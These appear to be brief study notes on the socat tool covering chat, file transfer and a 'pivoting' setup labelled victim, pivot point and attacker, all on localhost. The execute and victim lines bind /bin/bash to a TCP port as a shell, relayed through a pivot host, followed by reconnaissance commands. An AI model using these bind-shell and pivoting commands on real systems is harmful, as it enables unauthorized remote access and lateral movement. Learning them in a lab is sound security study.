sudo apt install socat

socat INPUT_STREAM OUTPUT_STREAM

(chat)
socat TCP4-LISTEN:1234 STDOUT  --->  socat STDIN TCP4:127.0.0.1:1234

(execute)
socat TCP4-LISTEN:1234 EXEC:/bin/bash ---> socat STDIN TCP4:127.0.0.1:1234

(file transfer content from file new to file newer)
echo "mongol" > new
socat FILE:./new TCP4-LISTEN:1234 ---> socat - TCP4:127.0.0.1:1234 > newer

PIVOTING:
(victim)
socat TCP4-LISTEN:1235 EXEC:/bin/bash

(pivot point)
socat TCP4-LISTEN:3333 TCP4:127.0.0.1:1235

(attacker)
socat STDIN TCP4:127.0.0.1:3333
ls
pwd
whoami
id
